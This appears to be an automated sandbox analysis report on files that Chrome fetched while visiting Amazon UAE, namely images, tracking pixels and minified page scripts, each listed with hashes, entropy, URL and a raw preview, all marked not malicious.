                                                                                                                                                                                                        MD5:C1747CA74BA1F870A81718E87FD104FA
                                                                                                                                                                                                        SHA1:DA60A0186987E513029FE5573B79F00A12323E4A
                                                                                                                                                                                                        SHA-256:A72477E19A8E1A2665F3D168F328C7903149BE355BB33E5F687D159D2E9236AE
                                                                                                                                                                                                        SHA-512:846212B9D589AE4F376A641F3802217B75E5700336BE7CB6897881A97B743D64D8BCAF0DBB8E740B2E15AEDECBE38910431CA42868BC01E47AC9EDDB4DBFC1AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................g)f....F>...~.....^..6v....7.w...U.*...?E.....:.~./2...../......?..PH.v.Z*^.Z..R.._g.D..4.*.q..[O.y....-c.O>uO+..l...6....^g.......;`t.j..._..UR..h..O..:z.jU....N.....U..xF..K...Q.4..TP..0..T.C..gz.....z.[.i.....)o5.k.@TS..Fs.{zJ...;...'....m.m./tR.q!.;}?<.0.....X.Q.qD.Dl...=}..&Q..`.&..0...I...2.-..%.f.2..;".....^.K]4.\M..].....l.. ...L.&....9..+....L).:.0i.7M..rc.kY./.l.O@,....T..2...^W.....L.....dHisr....\-.U..S.@.V.z.B..~.MVm..........F.../.F.....xQ...b.$;.ap`.y......+nmG.Eu.*...Y.csi.Zq.^.%Ux.b..z.r=qUL[......w.TZ.T}.0<.{.......0....n&..`.d....s#..(8.].w..~...X.k=.f.x...5OfcqN....<.5..=M$.c...3.Oi.Z..*..)..@.L.G../*......n...p..jg|...E.5.a5.....8Isn.@.@....!.O.7..Gq..s+..amH..n.VDb{....y....nz;LY0.&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1467054
                                                                                                                                                                                                        Entropy (8bit):5.960621784851465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:VDSWZhjZ3LSqo6aJ8jMRIFxLIJKUYZd6SPfS2dHy1D30YJmpoUM0f3jlllQRquMK:NBZhjpSl6aJjbnm3QlD
                                                                                                                                                                                                        MD5:0F816DCC640E8E61CD91D8FECD506239
                                                                                                                                                                                                        SHA1:80A38CE38F0ED430F527074B01A5987283E4C036
                                                                                                                                                                                                        SHA-256:E74F63C33D04C3C10ACEB422221B019D0B5FA9E8C798C576E9E9DF848C26205D
                                                                                                                                                                                                        SHA-512:6B78E6575C493A995B9D01CB9E727085144B349062FDF3A984B2063C05AFC0FA7B93F9F2B016F86817BD21697E236F47E4401A5F4DD8A24DED279ACC3B32D63E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("ACICAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET ACICAssets - 1.0./////////////////////////.// BEGIN FILE js/acic.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D61669%26at%3D61669%26t%3D1723729136980%26csmtags%3DendVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61669
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?at&v=0.295223.0&id=B82A0YC1SM3B4A82DCGS&ctb=1&m=1&sc=B82A0YC1SM3B4A82DCGS&pc=4280&at=4280&t=1723729112260&csmtags=csm-feature-touch-enabled:false&pty=i18n-preferences-web&spty=subSelectPreferences&pti=undefined&tid=B82A0YC1SM3B4A82DCGS&aftb=1&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3709
                                                                                                                                                                                                        Entropy (8bit):7.8847833941951455
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TlSCATUHcA/RmrREPqPV4kwIwyb5mPSHddsvjv/:YCATud/4REPqtPwIgPS9iT
                                                                                                                                                                                                        MD5:27DE4DA098E37299CDA43C7FFDF7B49C
                                                                                                                                                                                                        SHA1:880AF2826DAE3F5B0B6D09B5543112F4F68B0A15
                                                                                                                                                                                                        SHA-256:6EAF668D61300D0B970F72617B65D2D9E7F3CCB00C4BC19F21C25B89DC59B8F8
                                                                                                                                                                                                        SHA-512:0E2457B9AF8C739577135E6F585A17D9ED2B7EFAE97DFFB66EC1D908278E91A4BB207E0D779A14C291FA7D5C5A16EDC82A357FBE67307D07D6476E185660083E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1...AQa"23r.......#%BRSqt.$s....Ub..................................................1.!.AQ..."2..q..Ca............?...*J.R......)@)JP.W.2p+..P.m.J."'.>H3...CH..oe.....(9peR.........9..........m.lL9".L.U.~."....n.?..8.Kx>.~.......]......6..c.{.....I.Z.i..)JP.JR.R....(.)J.JR.R..=a......?....M.^....\v.....G......V%.yj.._...-.....;.`..%1..f$.7.p.Z;...G$.D{y.xl..#.....!r..e#..`..>.*.....Y.2..1..'..*.$7...$O.N.A..u...+..@".m['..2mcBs.yR....(.)J.JS..../..#^Y...;...P.pi..S...S...R..j.E.8Q.Pt.....~.......w....4.S}~..z}.k...G..BB.....MN...Z.Q....a4..i.>....m...).....JR.A....PN..K.2U..V...$.8..._z..M...Ygvg.;H.....k.#..pG......wq..;.%...#.#p<..|.i....].[:a}pn.....:.V...E......I:3.o...Q`C..Sk....4.F@...Io{..QF...8.|.TT....4G J.9^^.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1888
                                                                                                                                                                                                        Entropy (8bit):7.5917338157932415
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0kNw8jM2kM8or0g/qQEl8QwsSYdLtyBNDV9U1CQznX:TMAMy8sDZa8nKeBR4QQznX
                                                                                                                                                                                                        MD5:4A63B2280F3E13B697E5F0391C9633F7
                                                                                                                                                                                                        SHA1:DE3DCE1178A4C966D65763D5AAD0BDD07078D540
                                                                                                                                                                                                        SHA-256:8984CB5A520E6CE7843C2FD8711FBE2D7081CDD31AA3BA1A4E512D9C973618EE
                                                                                                                                                                                                        SHA-512:47BBAE2F375554915173CD7E3498885720655766C9736D2189B49CC92069B295CC86D87170455ACF4171F41E83E302812F48C1961F95CC8937B5CC892A13C127
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........2................................................................v..........#I%;.[.KzQ#....j..[T..@....2..%..kX........zR(.......ZmQ:...5}+.......N....d.^y7..';.}..7.z9..B.sgO.9...].}...[...N@...B..+..........;.hy..F...41H......?A. .S.b>".*...UZ.V>.*.X..[.?n.0.. ...................?...@..........................!AQ..."12R.....0a...Bq.....#S`b$3r..........?....X.3.N\.h.I01.8..........?.y.x.A.e..O.?..W.i..y.\ I...?/.....[SN.i.hB........Z.q.....2D...I.p1...>A.d.o..hV=....<.J...I.&.p.."..9u:.}.$...W...u.RB.H.!Z...|.)Zd1.-.P7.'.........._@..,;...V..t..t+Xr..(...JA.4o2.o..v`..Yqv.7S..~..6R.b."..r.(J.\...bDa.+TI.N.2....2...-..^;.!iA..(..E.I....U......\B..\...x.o.....}Hum)Z.+._.....Ah.2Nu$\C.T..&..i[.?..M.`8..$....I6H......u..@>&%.j..X...W....N.@J....-R......... ......>....6RS..-..PR..@..)...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):263193
                                                                                                                                                                                                        Entropy (8bit):5.398223615352051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:14+ME+AneR9yT5VoSjzppWCqfgEpNg4syp1kAs6aOb8lY6HEbrcaJn9Bed7oX/z4:14+ME+AnpT56SjzppWCqfgEpNg4BrkAE
                                                                                                                                                                                                        MD5:51D454DF00DBE6104CD24476C0405FF3
                                                                                                                                                                                                        SHA1:92BDEFC136C32CB8009F61503DB294A8CB0698CB
                                                                                                                                                                                                        SHA-256:E9681976FDD4F0051427351564B6922798CDD0EA3E1F6FFD868A55D6F7F261BF
                                                                                                                                                                                                        SHA-512:E9AC988864AA3CC325AAF53F949F59832E5E31C012AB383018825B0E4C80764F9A1D55B750EB833528D70A86D221440966F9B7BBFABAE7F7F7BCEA6F6EEF4A88
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D51%26pc0%3D404%26ld0%3D404%26t0%3D1723729116933%26sc1%3Dportal-bb%26pc1%3D4%26ld1%3D4%26t1%3D1723729116592%26sc2%3DcsmCELLSframework%26bb2%3D359%26pc2%3D360%26ld2%3D360%26t2%3D1723729116889%26sc3%3DcsmCELLSpdm%26bb3%3D360%26pc3%3D376%26ld3%3D376%26t3%3D1723729116905%26sc4%3DcsmCELLSvpm%26bb4%3D376%26pc4%3D377%26ld4%3D377%26t4%3D1723729116906%26sc5%3DcsmCELLSfem%26bb5%3D377%26pc5%3D377%26ld5%3D377%26t5%3D1723729116906%26ctb%3D1:2629
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3095
                                                                                                                                                                                                        Entropy (8bit):7.769203667509138
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:W20DAY47LALVCGTXcpTJxYEe9PJj4jvLgHA1:W20DvdHMpTJv6Jj4jzgHA1
                                                                                                                                                                                                        MD5:9EC6CC12F6B0FF0FB05D2B355EF68C35
                                                                                                                                                                                                        SHA1:29D6B7A4584DDBB7BBD687FFAAEF44568AA52F56
                                                                                                                                                                                                        SHA-256:C36677AFDFEB29C9EE213C148973DA50589D05FFBAB7749517F6ED250D7E9AE3
                                                                                                                                                                                                        SHA-512:5F34FA2F602789E866E3B366905D436C40700311524DE34D05FC6F840438885207E669DDF891DE233D04389736FE8FB0D67969CB6FB4162CE669B66314A79180
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........2.....................................................................N..$..............,1....s.B}i........u.U..z..P|..i..q^9r.M...4........MI.......x..f....^|.2w]2.[qm@d.....V.j+.#og...e..<...".T.O......>:.?<?..w..b....{...Af`[....>.....s.+.1@..".Nx........_%N..G.j.x:..xzH..O....Z...............-............................@..!0....# "'7P.............a.Q.....t.L.U....D..]\..8..F.L.>.....S&......#-'.M^N...N'>...t.[L7S:3Fo.5g`....Mn/b.--..w..r..h..3H.6..s.[.1....]"&...2s...8..XsK.0.^v.....o.o..F4....;.*..n.."..U.@y...Hr.B.......!..Z.o..NS..a#pG?..llwU.B'<....'L..Z..1r....e!V0$.c..lW8.G.m.n&.......7.!...0....J.?W..L%M.....G.U.=.z.W...HE.`.2O.....#..Q.t...W.A?..IQt...=.H.........'{...]]......a.Ol.J..&.....L....T...u.Jj..Z..I...P.#h9n*..5.....\b.....(..M7'.7rK.A./,(4......s.#.~.t
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ctb%3D1%26ic%3D2%26m%3D1%26sc%3D0RPFFN4XC9JAK0QN8ZQ4%26pc%3D4237%26at%3D4237%26t%3D1723729120766%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26ui%3D2%26lob%3D1:4236
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8552
                                                                                                                                                                                                        Entropy (8bit):7.836219212963423
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:WWB4YHuf//BGE4Eb6osoZR77m8ZQ46Q+CkODl5B0X/:v+YHuXF6osS97HZQ9QwsnB0v
                                                                                                                                                                                                        MD5:F624BB6683A28BA068F17CC982FE318D
                                                                                                                                                                                                        SHA1:BB113F823C519DEC019F106ADE3338F6CD034349
                                                                                                                                                                                                        SHA-256:9AE1F9AFC6B3BE1810CC7C5971D800FE1D39D18512D729E9829C2319E55B092C
                                                                                                                                                                                                        SHA-512:53B80DAD33011242781820EC4D76083134CA2EB11BC7BBE3A4AB50E223824EFEAD626A0D58C5FF6D3B87005CA553A7094FAB9FCB26066C4BB2CB356828346E8E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........6..............................................................................................................f..k.f..k.f..k.f..k.f..k.f..k.f..........9ZT.........`.2........9ZT5.".z.O.....]..l....xw..t.....g.l/.qHF..e.M.....m.....&...d.%...9..........r...B]e..y..7...|..\i3Lt\..._R.O(...m...E0.....c=)..k....t..>.X..9.(.......3..F.9.<..#.~..-.o..T...@}.j..@..w..#.:.=...y.Y./=-_H.Z...0e........r...~.7-.4....a'....8.Sb....C.....)`.<...........V.....2ln...+.*.3..~....6.&..X..................v..1.........P....%......Lq.|sF..p$1#K1...m.i.a,..d"X<...........T..........<................\-...\-...\-...\-...\-...\-.............'I.L.........av-..............4..s..u......y..+.v..XW......3)......#.......).G.A5...}.6.6.&d...........~..&/a.........>..]9...2...........m......u.=a........4.Jw.A...i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4405
                                                                                                                                                                                                        Entropy (8bit):7.778404097758394
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T0fmezCpK1fzxjPFzFeEQnhu7SDHvwzuwmSUfGBZxGT:qep27FPFzFeEchfWmn
                                                                                                                                                                                                        MD5:602453D6A1F37C8B2206C5D2248F00B7
                                                                                                                                                                                                        SHA1:2F3513F1886A38CB57C0A0A2A7D171AD68B7DC19
                                                                                                                                                                                                        SHA-256:FF937553832CD1765784934627764B1447A3D8B0411834F98694320C0CA683AB
                                                                                                                                                                                                        SHA-512:1F4200762D8DEA6CEE821C6E3A732F3E3E5C4D60B35DC622A0AAD98BFFBF9734AC1DBFEA9AF4CDE108C29AB2BC4815AB1DE164E61F0F102141BC9A77B5429E63
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/317JiGToz-L._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...............................................................................(....be.^.&%.!.s.3....q1.P../..<[C...A ....EJ....1......2.;cSl.m.Z.lT.-)Sp.....y....2...7..a ....2.q:#.....\y...ej.....{.}.^..aZ.;..%.....`......&....E.D..|..4.}..uF]Ue...j.X...|..ix...,N..N.+.9..{9.(.....-.._..}..$..Sz9ox.S.s;;._e..nq\.*..K+.....+..#i..b....6J6&.O.^.NX...).\.x~....{..1..dUl..kuy.Y.<..Wu.. ...#$."n.........oWqcZ..*..L....3....R..z.......Cf ...#$.bj......v....,.........s^.FN._'.].t..t.4t..Hl.....l.lM@.9.#.2.?m..".Yi.^J[m......{.v.r.........6.....2N2&..>.~..........i..R4..m.].....F+......6......R&&..........YFU..T..:.....m.Jg....6i...-.}5Pg......E..A].\{+....K^6......o+. ................2............................ 013A.!245."B#$Q`%Rq............Q.y'.....H...W....>.^.x...*.v..n.6....ccOTA..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3157
                                                                                                                                                                                                        Entropy (8bit):7.875151339724645
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rmtUzK7eeI6ahxS5ZCe1elrPbc9Gpzme4eS1HFiPnKB+XZrpzTnLpD+Np0MAQ:TDUz/4CieR1girNT1DGmMA11Rm
                                                                                                                                                                                                        MD5:8A8F97EE467B7450693CF229FE06C7A9
                                                                                                                                                                                                        SHA1:DA7E40F0F24141E573095072F2CC778901DFF45D
                                                                                                                                                                                                        SHA-256:E23AB0277A10A719139E16D976900C795F80AB34BE28F632F6530099E821E277
                                                                                                                                                                                                        SHA-512:119505C239A8645AEC99590210FC7A296B8C1B9F889C80658EA5BDCA8F5DD0186D6DE44F9677E7C658B0979B91ED4C6603A4B10EF28D1E9865499320CAF4CBF6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1A.Qaq...."2..Rr.....$3s....BS#%CTbc................................................1...!A."2..............?...*.I..........Ts.=.C...i.n....h...{y.#..5\.1.,....4M.w.....e.....i...Gq./`.....5.P...4....H>".kwN*G..`..........A....f...5..`...5.....J.J..n(.t.;...o.S.F>y...7..k.G.@P6.Q.._.H...l|4..C}...}.j....%.G.....'..O...[c..zD....B.frOge..y...."f(.A..j./.......s.wTe..j.j..UdmjY..+..(..m.7.N......M...QOi.......<dw.G..4{..b..!e..G....g..}...#..{q".3.T..W..8....Gq_.(.H.S.=..N .G...e.....QKk..GQ..8i:.#l6.XZk....SB,0......x...O....M.........G.e.._z....\....j.G..../b....>Y.\M.......~t.........3TY..|y"TZ..A.a....{)..%....^.....t..I......C|R.=..n'=...d<Px.?1Ze1.*y......iP....H[Z..u....?..Iv..'7.4.m....V...].v.S....2.. .=..Uc..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4119
                                                                                                                                                                                                        Entropy (8bit):7.888677027917507
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TxXslZ1uqS4BG2/slaK63PDuMV/LyqNySHRAa5CpW50:izEiD/ZKwrus/LvrHF8WW
                                                                                                                                                                                                        MD5:DCF43FDB604979CCA05427CC32DC2850
                                                                                                                                                                                                        SHA1:FB4934945EF5D284A69A193E975B7661D127B8EA
                                                                                                                                                                                                        SHA-256:8E442B455E6EFB426B4D636B525C3E3368792F4D610B270C3D3967A6C009E0AB
                                                                                                                                                                                                        SHA-512:3EBD82451B82ED87C29E28B9C9ACA98F3C60D1F0CAF8060AD6444E634D1035C12FE4C7A65A2067063C7595DA92212EF4FE8CEF20446391EC94E83A7BF001585C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!.1A.."Qa.2q.......#BR......$%br..CST.................................................!1.....Qa."ABqr....R...#............?.....h6.<..R..^Z..+.^....q..-.D.Ltf.+4.Y!.V@.....v..1.z..*c.[...cP.3.K......et.#e.j.....t....f'...{m.,.z...F..O.W.v/.G........R.........arH.w..+.M..^.....+..z.y.U..J....)J.5..R.....4..R..)JR.".2....k4...c..'..z.....E..o.WB..|......Q.1..W...n:.R...~..x.<.#.q...2.......VU,.+.u....M..j..I..$.X...N7$.U&..u..O..Hb.\.N..:|.}+.o....1../....:p.9...?....g.s..V.c...3..:...........g....&9.1L.1...k.~..7R.|.3..*ip..Ec......9.k.U.5n/b.3d-.g......d......)";.oA"....-.9ow.^.=I.k..%..WB.7.8..~.5._f.<...>...T...!;.c..k"......./.....\...4..]..|.|....>.....rG...s.g.)..p..H..`.o.>.w...J0.<......j......z..'.....L...db.+...t.)J@..(.EJR
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 207x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8537
                                                                                                                                                                                                        Entropy (8bit):7.9527428303527
